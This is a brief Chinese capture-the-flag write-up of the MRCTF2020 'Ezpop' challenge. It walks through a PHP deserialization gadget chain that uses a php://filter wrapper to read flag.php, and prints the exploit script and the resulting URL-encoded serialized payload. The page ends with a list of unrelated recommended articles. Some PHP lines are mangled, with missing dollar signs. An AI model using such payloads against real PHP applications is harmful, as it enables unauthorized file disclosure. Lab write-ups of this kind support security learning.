[MRCTF2020]Ezpop1

打卡题目

代码审计

果我们把modifiy对象的var改为php伪协议,然后成功调用invoke魔术方法就可以读出flag

调用invoke魔术方法需要将对象当做一个函数来使用,这样invoke方法就会自动调用

<?php

class Modifier {

protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";

public function append($value){

include($value);

}

public function __invoke(){

echo "__invoke";

this-\>append(this->var);

}

}

class Show{

public $source;

public $str;

public function __construct($file='index.php'){

this-\>source = file;

echo 'Welcome to '.$this->source."<br>";

}

public function __toString(){

return $this->str->source;

}

public function __wakeup(){

if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {

echo "hacker";

$this->source = "index.php";

}

}

}

class Test{

public $p;

public function __construct(){

$this->p = new Modifier();

}

public function __get($key){

echo "__get";

function = this->p;

return $function();

}

}

$a = new Show();

$a->source=new Show('aaaa');

$a->source->str=new Test();

echo "this is:";

echo urlencode(serialize($a)); //这里urlencode是为了防止 protected 对象对结果造成影响。

运行结果

运行得到

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22aaaa%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

一看base64编码

解码

得到flag

相关推荐
henysugar24 分钟前
便捷删除Android开发中XML中重复字符串资源的一个办法
android·xml
aqi001 小时前
FFmpeg开发笔记(七十八)采用Kotlin+Compose的NextPlayer播放器
android·ffmpeg·音视频·直播·流媒体
你过来啊你2 小时前
Android开发中技术选型的落地方案
android·技术选型
消失的旧时光-19432 小时前
Android Jetpack 组件库 ->Jetpack Navigation (下)
android·android jetpack
你过来啊你2 小时前
Java面向对象思想解析
android·java
愿天深海2 小时前
Flutter 提取图像主色调 ColorScheme.fromImageProvider
android·前端·flutter
Python涛哥3 小时前
go语言基础教程:【2】基础语法:基本数据类型(整形和浮点型)
android·开发语言·golang
你过来啊你3 小时前
进程线程协程深度对比分析
android·线程·进程·协程
xzkyd outpaper4 小时前
Android中ViewStub和View有什么区别?
android·开发语言·面试·代码
Dnelic-14 小时前
Android 5G NR 状态类型介绍
android·5g·telephony·connectivity·自学笔记·移动网络数据